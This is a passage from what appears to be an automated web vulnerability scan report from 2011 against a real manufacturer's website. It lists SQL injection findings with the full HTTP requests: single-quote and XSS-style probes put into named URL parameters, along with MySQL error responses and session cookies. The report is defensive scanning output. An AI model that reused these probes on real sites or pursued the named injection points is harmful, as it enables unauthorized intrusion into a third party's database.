Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:37 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

1.84. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:11 GMT
Connection: Keep-Alive
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/scr' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:13 GMT
Connection: Keep-Alive
Content-Length: 15521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.85. http://www.millerwelds.com/financing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:18 GMT
Connection: Keep-Alive
Content-Length: 27887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?int_source=/products/accessories/international/&int_medium=bannerad&int_content' at line 1)<br>
...[SNIP]...

1.86. http://www.millerwelds.com/financing/ [int_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 13992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?int_source=/products/accessories/international/&int_medium=bannerad' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:09 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.87. http://www.millerwelds.com/financing/ [int_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace'&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:52 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace''&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:53 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.88. http://www.millerwelds.com/financing/ [int_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad'&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:33 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad''&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:35 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.89. http://www.millerwelds.com/financing/ [int_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The int_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/'&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:17 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/''&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:18 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.90. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:40 GMT
Connection: Keep-Alive
Content-Length: 13917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:41 GMT
Connection: Keep-Alive
Content-Length: 15803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.91. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
